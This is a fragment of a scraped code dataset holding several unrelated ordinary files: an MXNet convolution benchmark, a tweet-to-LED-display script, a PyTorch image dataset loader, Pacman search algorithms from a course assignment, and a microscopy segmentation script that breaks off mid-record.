----------\n ctx: mx.ctx\n Context to run benchmarks\n dtype: str, default 'float32'\n Precision to use for benchmarks\n profiler: str, default 'native'\n Type of Profiler to use (native/python)\n int64_tensor: str, default 'off'\n Input tensor size to use for tests (if on, dimensions >= 2**32)\n warmup: int, default 25\n Number of times to run for warmup\n runs: int, default 100\n Number of runs to capture benchmark results\n\n Returns\n -------\n Dictionary of results. Key -> Name of the operator, Value -> Benchmark results.\n\n \"\"\"\n\n standard_data_list_conv1d = [(32, 3, 256), (32, 3, 64)]\n int64_tensor_data_list_conv1d = [(2**30, 1, 4)]\n standard_weight_conv1d = (1, 3, 3)\n int64_tensor_weight_conv1d = (1, 1, 1)\n standard_kernel_conv1d = (3,)\n int64_tensor_kernel_conv1d = (1,)\n standard_data_list_conv2d = [(32, 3, 256, 256), (32, 3, 64, 64)]\n int64_tensor_data_list_conv2d = [(2**28, 1, 4, 4)]\n standard_weight_conv2d = (1, 3, 3, 3)\n int64_tensor_weight_conv2d = (1, 1, 1, 1)\n standard_kernel_conv2d = (3, 3)\n int64_tensor_kernel_conv2d = (1, 1)\n\n if int64_tensor == 'on':\n data_list_conv1d = int64_tensor_data_list_conv1d\n weight_conv1d = int64_tensor_weight_conv1d\n kernel_conv1d = int64_tensor_kernel_conv1d\n data_list_conv2d = int64_tensor_data_list_conv2d\n weight_conv2d = int64_tensor_weight_conv2d\n kernel_conv2d = int64_tensor_kernel_conv2d\n else:\n data_list_conv1d = standard_data_list_conv1d\n weight_conv1d = standard_weight_conv1d\n kernel_conv1d = standard_kernel_conv1d\n data_list_conv2d = standard_data_list_conv2d\n weight_conv2d = standard_weight_conv2d\n kernel_conv2d = standard_kernel_conv2d\n\n conv1d_benchmark_res = []\n conv2d_benchmark_res = []\n # Conv1D Benchmarks\n for conv_data in data_list_conv1d:\n conv1d_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Convolution\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": conv_data,\n \"weight\": weight_conv1d,\n \"bias\": (1,),\n \"kernel\": kernel_conv1d,\n \"stride\": (1,),\n \"dilate\": (1,),\n \"pad\": (0,),\n \"num_filter\": 1,\n \"layout\": 'NCW'}],\n warmup=warmup,\n runs=runs)\n # Conv2D Benchmarks\n for conv_data in data_list_conv2d:\n conv2d_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Convolution\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": conv_data,\n \"weight\": weight_conv2d,\n \"bias\": (1,),\n \"kernel\": kernel_conv2d,\n \"stride\": (1, 1),\n \"dilate\": (1, 1),\n \"pad\": (0, 0),\n \"num_filter\": 1,\n \"layout\": 'NCHW'}],\n warmup=warmup,\n runs=runs)\n # Prepare combined results\n mx_conv_op_results = merge_map_list(conv1d_benchmark_res + conv2d_benchmark_res)\n return mx_conv_op_results\n\n\ndef run_transpose_convolution_operators_benchmarks(ctx=mx.cpu(), profiler='native', int64_tensor='off', dtype='float32', warmup=25, runs=100):\n \"\"\"Runs benchmarks with the given context, precision (dtype), and input data size (int64_tensor) for all the transpose convolution\n operators in MXNet.\n\n Parameters\n ----------\n ctx: mx.ctx\n Context to run benchmarks\n dtype: str, default 'float32'\n Precision to use for benchmarks\n profiler: str, default 'native'\n Type of Profiler to use (native/python)\n int64_tensor: str, default 'off'\n Input tensor size to use for tests (if on, dimensions >= 2**32)\n warmup: int, default 25\n Number of times to run for warmup\n runs: int, default 100\n Number of runs to capture benchmark results\n\n Returns\n -------\n Dictionary of results. Key -> Name of the operator, Value -> Benchmark results.\n\n \"\"\"\n\n standard_data_list_conv1d_transpose = [(32, 3, 256), (32, 3, 64)]\n int64_tensor_data_list_conv1d_transpose = [(2**30, 1, 4)]\n standard_weight_conv1d_transpose = (3, 1, 3)\n int64_tensor_weight_conv1d_transpose = (1, 1, 1)\n standard_kernel_conv1d_transpose = (3,)\n int64_tensor_kernel_conv1d_transpose = (1,)\n standard_data_list_conv2d_transpose = [(32, 3, 256, 256), (32, 3, 64, 64)]\n int64_tensor_data_list_conv2d_transpose = [(2**28, 1, 4, 4)]\n standard_weight_conv2d_transpose = (3, 1, 3, 3)\n int64_tensor_weight_conv2d_transpose = (1, 1, 1, 1)\n standard_kernel_conv2d_transpose = (3, 3)\n int64_tensor_kernel_conv2d_transpose = (1, 1)\n\n if int64_tensor == 'on':\n data_list_conv1d_transpose = int64_tensor_data_list_conv1d_transpose\n weight_conv1d_transpose = int64_tensor_weight_conv1d_transpose\n kernel_conv1d_transpose = int64_tensor_kernel_conv1d_transpose\n data_list_conv2d_transpose = int64_tensor_data_list_conv2d_transpose\n weight_conv2d_transpose = int64_tensor_weight_conv2d_transpose\n kernel_conv2d_transpose = int64_tensor_kernel_conv2d_transpose\n else:\n data_list_conv1d_transpose = standard_data_list_conv1d_transpose\n weight_conv1d_transpose = standard_weight_conv1d_transpose\n kernel_conv1d_transpose = standard_kernel_conv1d_transpose\n data_list_conv2d_transpose = standard_data_list_conv2d_transpose\n weight_conv2d_transpose = standard_weight_conv2d_transpose\n kernel_conv2d_transpose = standard_kernel_conv2d_transpose\n\n # Conv1DTranspose Benchmarks\n conv1d_transpose_benchmark_res = []\n for conv_data in data_list_conv1d_transpose:\n conv1d_transpose_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Deconvolution\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": conv_data,\n \"weight\": weight_conv1d_transpose,\n \"bias\": (1,),\n \"kernel\": kernel_conv1d_transpose,\n \"stride\": (1,),\n \"dilate\": (1,),\n \"pad\": (0,),\n \"num_filter\": 1,\n \"no_bias\": False,\n \"layout\": 'NCW'}],\n warmup=warmup,\n runs=runs)\n # Conv2DTranspose Benchmarks\n conv2d_transpose_benchmark_res = []\n for conv_data in data_list_conv2d_transpose:\n conv2d_transpose_benchmark_res += run_performance_test([getattr(MX_OP_MODULE, \"Deconvolution\")],\n run_backward=True,\n dtype=dtype,\n ctx=ctx,\n profiler=profiler,\n inputs=[{\"data\": conv_data,\n \"weight\": weight_conv2d_transpose,\n \"bias\": (1,),\n \"kernel\": kernel_conv2d_transpose,\n \"stride\": (1, 1),\n \"pad\": (0, 0),\n \"num_filter\": 1,\n \"no_bias\": False,\n \"layout\": 'NCHW'}],\n warmup=warmup,\n runs=runs)\n # Prepare combined results\n mx_transpose_conv_op_results = merge_map_list(conv1d_transpose_benchmark_res + conv2d_transpose_benchmark_res)\n return mx_transpose_conv_op_results\n", "repo_name": "apache/mxnet", "sub_path": "benchmark/opperf/nd_operations/nn_conv_operators.py", "file_name": "nn_conv_operators.py", "file_ext": "py", "file_size_in_byte": 17211, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20642, "dataset": "github-code", "pt": "46", "api": [{"api_name": "mxnet.cpu", "line_number": 38, "usage_type": "call"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 87, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 87, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 102, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 102, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 119, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 119, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.common_utils.merge_map_list", "line_number": 132, "usage_type": "call"}, {"api_name": "mxnet.cpu", "line_number": 136, "usage_type": "call"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 193, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 193, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 211, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 211, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.common_utils.merge_map_list", "line_number": 228, "usage_type": "call"}, {"api_name": "mxnet.cpu", "line_number": 232, "usage_type": "call"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 288, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 288, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.benchmark_utils.run_performance_test", "line_number": 308, "usage_type": "call"}, {"api_name": "benchmark.opperf.rules.default_params.MX_OP_MODULE", "line_number": 308, "usage_type": "argument"}, {"api_name": "benchmark.opperf.utils.common_utils.merge_map_list", "line_number": 325, "usage_type": "call"}]} +{"seq_id": "9432171229", "text": "#!/usr/bin/env python3\n\nfrom displaytools import *\nfrom sockettools import *\nimport time\nimport datetime\nimport subprocess\nimport signal\nimport sys\n\nMSG_PREFIX = '[run.py]: '\nchild_processes = []\nDISPLAY_IP = \"127.0.0.1\"\n\n###############################################################################\n# start of configuration section\n# only edit below this point\n###############################################################################\n\n# set the program you want to run\n# The options are:\n# - 'twitter' : listen to a twitter feed\n# - 'custom' : run the custom program that is bellow\nPROGRAM = 'twitter'\n\n##\n## Options for the twitter program\n##\n\n# Initial text to show on top row\nTWITTER_TWEET_TO_TEXT = 'Tweet naar:'\n\n# Topic to follow on twitter, without '#'\nTWITTER_TOPIC = 'boeschrik' \n\n###############################################################################\n# end of configuration section\n# do NOT change anything beyond this point, unless you know what you are doing\n###############################################################################\n\n###############################################################################\n# Definition of the custom program\n# You should only change this if you know what you are doing\n###############################################################################\ndef custom():\n social = PriorityReceiver()\n f = Font('ledFont')\n d = Display(DISPLAY_IP, echo = False)\n\n while True:\n time.sleep(1)\n\n###############################################################################\n# This is the twitter routine. You should NOT change this\n###############################################################################\ndef twitter():\n social = PriorityReceiver()\n f = Font('ledFont')\n d = Display(DISPLAY_IP, echo = False)\n \n timestamp = datetime.datetime.now().isoformat()\n twitter_output_file = open('log/twitter_'+timestamp, 'w')\n \n # run the twitter receiver\n twitter = subprocess.Popen(['/usr/bin/python3', 'twitterFollower.py', TWITTER_TOPIC],\n stderr = subprocess.STDOUT,\n stdout = twitter_output_file)\n child_processes.append(twitter)\n print(MSG_PREFIX + 'Twitter follower started')\n \n \n \n # Set initial text on the display\n StaticRow(d, f, TWITTER_TWEET_TO_TEXT).load(0)\n StaticRow(d, f, '#' + TWITTER_TOPIC).show(1)\n print(MSG_PREFIX + 'Initial text placed on display')\n \n message = None\n priority = None\n \n print(MSG_PREFIX + 'Entering main loop')\n \n while True:\n social.update()\n \n # receive a new message if one is available\n if social.new_messages():\n message, priority = social.pop()\n print(MSG_PREFIX + 'Priority {}:\\t {}'.format(priority, message))\n \n else:\n time.sleep(1)\n \n if message != None:\n ScrollText(d, f, message, sleeptime = 0.025).show()\n\n\n###############################################################################\n# This is the twitter routine. You should NOT change this\n###############################################################################\ndef signal_handler(signum, frame):\n print(MSG_PREFIX + 'Received following signal: ', signum)\n\n if signum == signal.SIGTERM:\n print(MSG_PREFIX + 'Shutting down, goodnight!')\n for child in child_processes:\n try:\n child.terminate()\n except ProcessLookupError:\n pass\n sys.exit()\n\nif __name__ == '__main__':\n\t\n signal.signal(signal.SIGTERM, signal_handler)\n\n print(MSG_PREFIX + 'Goodmorning') \n if PROGRAM == 'twitter':\n twitter() \n elif PROGRAM == 'custom':\n custom()\n", "repo_name": "pietdevaere/muchosledjes", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 3780, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.sleep", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 61, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 65, "usage_type": "call"}, {"api_name": "subprocess.STDOUT", "line_number": 66, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 92, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 104, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 111, "usage_type": "call"}, {"api_name": "signal.signal", "line_number": 115, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 115, "usage_type": "attribute"}]} +{"seq_id": "4076209155", "text": "from torch.utils import data\nfrom PIL import Image\nimport random\nimport os\nimport os.path\nimport sys\n\nimport cv2\nimport numpy as np\n\ndef random_compress(img):\n rand_num = random.randint(40, 90)\n img_encode = cv2.imencode('.jpg', img, [int(cv2.IMWRITE_JPEG_QUALITY),rand_num])\n data_encode = np.array(img_encode[1])\n str_encode = data_encode.tostring()\n nparr = np.fromstring(str_encode, np.uint8)\n img_decode = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n return img_decode\n\ndef pil_loader(path):\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert('RGB')\n\n\ndef cv2_loader(path):\n img1 = cv2.imread(path)\n if np.random.random() < 0.5:\n size = np.random.choice([60, 80, 100])\n img1 = cv2.resize(img1, (size, size))\n img2 = cv2.cvtColor(img1,cv2.COLOR_BGR2RGB)\n img = Image.fromarray(img2)\n return img\n\nclass ImageFolder(data.Dataset):\n def __init__(self, trainList, transform=None, loader=None):\n super(ImageFolder, self).__init__()\n self.transform = transform\n if loader is None:\n self.loader = cv2_loader\n else:\n self.loader = loader\n with open(trainList) as f:\n self.samples = f.readlines()\n self.classes = int(self.samples[-1].split(';')[1]) + 1\n\n def __getitem__(self, index):\n path, target = self.samples[index].split(';')\n target = int(target)\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n\n return sample, target\n\n def __len__(self):\n return len(self.samples)\n\n", "repo_name": "deepcam-cn/FaceQuality", "sub_path": "dataset/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 1631, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 168, "dataset": "github-code", "pt": "41", "api": [{"api_name": "random.randint", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.imencode", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.fromstring", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.imdecode", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 32, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "32487685183", "text": "from __future__ import annotations\n\"\"\"\nThomas Caron - 1944066\nSlimane Boussafeur - 2017001\n\"\"\"\n\n# search.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\n\"\"\"\nIn search.py, you will implement generic search algorithms which are called by\nPacman agents (in searchAgents.py).\n\"\"\"\n\nimport util\nfrom typing import Any, List, Literal, Optional\nfrom dataclasses import dataclass\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self):\n \"\"\"util.raiseNotDefined()\n Returns the start state for the search problem.\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state):\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state.\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state):\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples, (successor,\n action, stepCost), where 'successor' is a successor to the current\n state, 'action' is the action required to get there, and 'stepCost' is\n the incremental cost of expanding to that successor.\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions.\n The sequence must be composed of legal moves.\n \"\"\"\n util.raiseNotDefined()\n\nDirection = Literal['NORTH', 'SOUTH', 'EAST', 'WEST', 'STOP'] # Type aliases\n\n@dataclass(eq=False)\nclass Node:\n state: Any\n previous: Optional[Node] = None\n direction: Optional[Direction] = None\n\n @property\n def path(self: Node) -> List[Direction]:\n \"\"\"\n Returns the direction taken to arrive at this node\n \"\"\"\n if self.previous is None:\n return []\n return self.previous.path + [self.direction]\n\n def __eq__(self, __o: Node) -> bool:\n return self.state == __o.state\n\n def __hash__(self) -> int:\n return hash(self.state)\n\n@dataclass(eq=False)\nclass CostNode(Node):\n \"\"\"\n Node used for A* and UCS\n This node is the same as the one previously declared except we add a cost field\n \"\"\"\n previous: Optional[CostNode] = None # overwrite\n cost: int = 0 # Cost from the start\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. For any other maze, the\n sequence of moves will be incorrect, so only use this for tinyMaze.\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n \"\"\"\n visited = set()\n stack = util.Stack()\n stack.push(Node(problem.getStartState()))\n\n while not stack.isEmpty():\n node: Node = stack.pop()\n if problem.isGoalState(node.state):\n return node.path\n if node in visited:\n continue\n visited.add(node)\n for state, direction, _, in problem.getSuccessors(node.state):\n stack.push(Node(state, node, direction))\n\n return []\n\n\ndef breadthFirstSearch(problem):\n \"\"\"Search the shallowest nodes in the search tree first.\"\"\"\n\n visited = set()\n queue = util.Queue()\n queue.push(Node(problem.getStartState()))\n\n while not queue.isEmpty():\n node = queue.pop()\n if problem.isGoalState(node.state):\n return node.path\n if node in visited:\n continue\n visited.add(node)\n for state, direction, _, in problem.getSuccessors(node.state):\n queue.push(Node(state, node, direction))\n\n return []\n \ndef uniformCostSearch(problem):\n \"\"\"Search the node of least total cost first.\"\"\"\n \n visited = set()\n queue = util.PriorityQueue()\n queue.push(CostNode(problem.getStartState()), 0)\n\n while not queue.isEmpty():\n node = queue.pop()\n if problem.isGoalState(node.state):\n return node.path\n if node in visited:\n continue\n visited.add(node)\n for state, direction, cost in problem.getSuccessors(node.state):\n next_node = CostNode(state, node, direction, node.cost + cost)\n queue.push(next_node, next_node.cost)\n\n return []\n\ndef nullHeuristic(state, problem=None):\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. This heuristic is trivial.\n \"\"\"\n return 0\n\ndef aStarSearch(problem, heuristic=nullHeuristic):\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n visited = set()\n queue = util.PriorityQueue()\n queue.push(CostNode(problem.getStartState()), heuristic(problem.getStartState(), problem))\n\n while not queue.isEmpty():\n node = queue.pop()\n if problem.isGoalState(node.state):\n return node.path\n if node in visited:\n continue\n visited.add(node)\n for state, direction, cost in problem.getSuccessors(node.state):\n next_node = CostNode(state, node, direction, node.cost + cost)\n queue.push(next_node, next_node.cost + heuristic(state, problem))\n \n return []\n\n\n# Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n", "repo_name": "tomtom103/INF8215", "sub_path": "devoir1/search.py", "file_name": "search.py", "file_ext": "py", "file_size_in_byte": 6491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "util.raiseNotDefined", "line_number": 42, "usage_type": "call"}, {"api_name": "util.raiseNotDefined", "line_number": 50, "usage_type": "call"}, {"api_name": "util.raiseNotDefined", "line_number": 61, "usage_type": "call"}, {"api_name": "util.raiseNotDefined", "line_number": 70, "usage_type": "call"}, {"api_name": "typing.Literal", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 81, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 74, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 101, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 95, "usage_type": "call"}, {"api_name": "game.Directions.SOUTH", "line_number": 111, "usage_type": "attribute"}, {"api_name": "game.Directions", "line_number": 111, "usage_type": "name"}, {"api_name": "game.Directions.WEST", "line_number": 112, "usage_type": "attribute"}, {"api_name": "game.Directions", "line_number": 112, "usage_type": "name"}, {"api_name": "util.Stack", "line_number": 127, "usage_type": "call"}, {"api_name": "util.Queue", "line_number": 147, "usage_type": "call"}, {"api_name": "util.PriorityQueue", "line_number": 166, "usage_type": "call"}, {"api_name": "util.PriorityQueue", "line_number": 192, "usage_type": "call"}]} +{"seq_id": "73499579643", "text": "\"\"\"\nExtract pouch volume\n\"\"\"\n\nimport skimage.io as io\nimport matplotlib.pyplot as plt\nfrom skimage.measure import regionprops\nfrom skimage.segmentation import active_contour\nimport numpy as np\n\n# import nucleo_segment classes\nfrom storage.image import ImageHandler\nfrom processing.image import ImageProcessing\nfrom frontend.figures.plot import Plot\n\n# define directories\nwork_dir = '/Users/schiend/Desktop/Drive/Experiments/Carles/'\n\n# define files\npouch_files = [\n 'Q4_late/vgQE-dsRed_mLamin-A488_wL3-L2 late sync_25C.lif - Series066.tif',\n #'Q4_early/vgQE-dsRed_mLamin-A488_eL3-L2 late sync_25C.lif - Series012.tif' # trachea in the way\n #'Q4_early/vgQE-dsRed_mLamin-A488_eL3-L2 late sync_25C.lif - Series015.tif' # tilted\n #'Q4_early/vgQE-dsRed_mLamin-A488_eL3-L2 late sync_25C.lif - Series020.tif' # ok\n #'Q4_early/vgQE-dsRed_mLamin-A488_eL3-L2 late sync_25C.lif - Series022.tif' # best\n #'Q4_early/vgQE-dsRed_mLamin-A488_eL3-L2 late sync_25C.lif - Series027.tif' # too weak\n]\n\npouch_thrs = [\n 40,\n #?,\n #?,\n 100\n #100\n]\n\npouch_imgs = list()\npouch_stacks = list()\n\nfor file in pouch_files:\n print('--- LOAD %s' % file)\n\n # load image - Z, C, Y, X\n pouch_imgs.append(io.imread(\n work_dir + file\n ))\n\n if len(pouch_imgs[-1].shape) > 3:\n # reorder axes - C, Z, Y, X\n if pouch_imgs[-1].shape[1] < 10:\n pouch_stacks.append(pouch_imgs[-1].swapaxes(0, 1)[0, 40:41:1, :, :, 0])\n else:\n pouch_stacks.append(pouch_imgs[-1][:, :, :, 0])\n else:\n pouch_stacks.append(pouch_imgs[-1][20:61:10])\n\nprocessing_steps = [\n ['EQU'],\n ['THR', 'OTSU', 100, 'no3D'], # checked\n ['CLS', 'bin', 5], # checked\n ['FILL'],\n ['OPN', 'bin', 2], # checked\n ['CONV_BIT', 16, '3D'],\n ['LABEL', 1, 'no3D']\n]\n\nTHR_STEP = 1\n\ndilate_step = [\n ['DIL', 'bin', 50]\n]\n\nfinal_steps = [\n ['CLS', 'bin', 30],\n ['FILL']\n]\n\narea_threshold = 1000\n\ncheck_params = False\nactive_contour = True\ncalc_union = False\nsave_as_stack = False\nshow_stack = True\nshow_range = range(0, 1, 1)\n\n###\n# Go through defined images and process\n###\n\nresults = list()\nresults_titles = list()\n\nfor i, pouch_stack in enumerate(pouch_stacks):\n print('--- PROCESS %i' % i)\n\n results.append(pouch_stack)\n results_titles.append('Original')\n\n pouch_volumes = list()\n\n if check_params is True:\n for i in range(0, 51, 10):\n processing_steps[1][2] = i\n pouch_volumes.append(ImageProcessing.apply_filters(processing_steps, pouch_stack, verbose=True))\n results.append(pouch_volumes[-1])\n results_titles.append('THR %i' % i)\n else:\n # set threshold\n processing_steps[THR_STEP][2] = pouch_thrs[i]\n\n pouch_volumes.append(ImageProcessing.apply_filters(processing_steps, pouch_stack, verbose=True))\n results.append(pouch_volumes[-1])\n results_titles.append('Threshold')\n\n # NEXT: Test active contours\n # ERROR: TypeError: 'bool' object is not callable\n if active_contour is True:\n s = np.linspace(0, 2*np.pi, 400)\n x = 600 + 300*np.cos(s)\n y = 585 + 300*np.sin(s)\n init = np.array([x, y]).T\n\n snake_img = active_contour(pouch_imgs[-1][0], init, alpha=0.015, beta=10, gamma=0.001)\n results.append(snake_img)\n results_titles('Snake')\n\n if calc_union is True:\n # go through labels and filter small ones\n pouch_volume_filtered = np.zeros_like(pouch_volumes[-1])\n union_pouch_volume = np.zeros_like(pouch_volumes[-1])\n\n for z in range(0, pouch_volumes[-1].shape[0]):\n print('- GET PROPS for z: %i' % z)\n\n z_props = regionprops(pouch_volumes[-1][z])\n\n # a list of dilated images\n dilated_imgs = list()\n\n # go through and filter by size\n for props in z_props:\n if props['area'] > area_threshold:\n # add to image\n dilated_imgs.append(np.zeros_like(union_pouch_volume[z]))\n\n for i, coords in enumerate(props['coords']):\n pouch_volume_filtered[z][int(coords[0]), int(coords[1])] = 1\n dilated_imgs[-1][int(coords[0]), int(coords[1])] = 1\n\n # dilate\n dilated_imgs[-1] = ImageProcessing.apply_filters(dilate_step, dilated_imgs[-1], verbose=True)\n\n print('- CALC UNION for %i dilated images' % len(dilated_imgs))\n\n # go through all dilated images and add union\n for o, dilated_outer in enumerate(dilated_imgs):\n for i, dilated_inner in enumerate(dilated_imgs):\n if o != i:\n union_pouch_volume[z] += np.logical_and(dilated_outer, dilated_inner)\n\n # add filtered and union to results\n pouch_volumes.append(pouch_volume_filtered)\n results.append(pouch_volumes[-1])\n results_titles.append('Filtered')\n\n pouch_volumes.append(union_pouch_volume)\n results.append(pouch_volumes[-1])\n results_titles.append('Union')\n\n # add union to filtered\n pouch_volume_final = pouch_volume_filtered + union_pouch_volume\n pouch_volume_final[pouch_volume_final > 1] = 1\n\n #for i in range(20, 41, 5):\n # final_steps[0][2] = i\n # pouch_volumes.append(ImageProcessing.apply_filters(final_steps, pouch_volume_final, verbose=True))\n # results_titles.append('CLS %i' % i)\n\n pouch_volume_final = ImageProcessing.apply_filters(final_steps, pouch_volume_final, verbose=True)\n\n results.append(pouch_volume_final)\n results_titles.append('Volume #%i' % i)\n\n if save_as_stack is True:\n ImageHandler.save_stack_as_tiff(pouch_volume_final, work_dir + ('%s_pv.tif' % pouch_files[i]))\n\n if show_stack is True:\n # show images\n stack_fig = plt.figure(figsize=(20, 10))\n\n # view the stack and the processing results\n\n cmap = list()\n for i in range(0, len(results)):\n cmap.append('hot')\n\n Plot.show_stacks(stack_fig, results, show_range, img_title=results_titles, colour_map=cmap)\n", "repo_name": "baemms/NucleoSegment", "sub_path": "playground/pouch_volume_r2.py", "file_name": "pouch_volume_r2.py", "file_ext": "py", "file_size_in_byte": 6218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "skimage.io.imread", "line_number": 44, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 44, "usage_type": "name"}, {"api_name": "skimage.segmentation.active_contour", "line_number": 81, "usage_type": "name"}, {"api_name": "processing.image.ImageProcessing.apply_filters", "line_number": 105, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing", "line_number": 105, "usage_type": "name"}, {"api_name": "processing.image.ImageProcessing.apply_filters", "line_number": 112, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing", "line_number": 112, "usage_type": "name"}, {"api_name": "skimage.segmentation.active_contour", "line_number": 118, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "skimage.segmentation.active_contour", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 131, "usage_type": "call"}, {"api_name": "skimage.measure.regionprops", "line_number": 